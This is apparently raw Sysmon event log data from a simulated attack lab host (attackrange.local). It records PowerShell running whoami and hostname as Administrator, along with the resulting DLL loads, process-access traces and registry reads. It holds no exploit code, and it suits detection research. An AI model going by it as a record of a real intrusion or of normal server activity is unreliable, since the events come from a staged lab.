CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057348213Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057348212Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057348211Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057348210Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057348209Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057348208Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057348207Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057348206Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057348205Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057348204Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057348203Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348202Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057348201Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057348200Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057348199Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exeMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88AtrueMicrosoft WindowsValid 10341000x800000000000000057348198Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057348197Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+30ef8c9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2593341(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25751e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2565f01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2573443(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572fb5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64) 154100x800000000000000057348196Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.538{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 18141800x800000000000000057348195Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:50.538{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x800000000000000057348194Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:50.538{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 534500x800000000000000057348193Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.536{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXE 12241200x800000000000000057348192Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:50.535{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000057348191Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.534{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\nlaapi.dll10.0.14393.3808 (rs1_release.200707-2105)Network Location Awareness 2Microsoft® Windows® Operating SystemMicrosoft Corporationnlaapi.dllMD5=63EB5F68082B8C8C392E5DAC1D4EC678,SHA256=58EC364601FA6FE26525D8ADB44B7EDEFCFB73E72897C77B6E37F73E1C7BF871trueMicrosoft WindowsValid 734700x800000000000000057348190Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.534{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\winrnr.dll10.0.14393.0 (rs1_release.160715-1616)LDAP RnR Provider DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationwinrnrMD5=B0DE13ABF238AB28E963629B977A012F,SHA256=43288C8A658C2F0CB0CB1C9D874506D6CEEF455AAB68CE2EF0D685DE8E3BA0C3trueMicrosoft WindowsValid 12241200x800000000000000057348189Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:50.534{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057348188Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:50.534{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057348187Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:50.533{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\system32\HOSTNAME.EXEHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000057348186Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.532{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000057348185Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.532{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000057348184Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.532{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000057348183Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\NapiNSP.dll10.0.14393.0 (rs1_release.160715-1616)E-mail Naming Shim ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationnapinsp.dllMD5=71514D9A6350A37B4F0BAA6ACB751771,SHA256=5DB99D6784900D85BB4A62E9F40B4EC628054D41B38A5E93F80C7A8BB066EBBBtrueMicrosoft WindowsValid 734700x800000000000000057348182Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000057348181Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057348180Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057348179Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057348178Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x800000000000000057348177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057348175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057348174Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057348173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exeMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1trueMicrosoft WindowsValid 10341000x800000000000000057348172Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057348171Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.516{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+30ef8c9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2593341(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25751e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2565f01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2573443(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572fb5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64) 154100x800000000000000057348170Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.489{8B6011A9-5BAA-618E-54F3-04000000F101}3560C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating 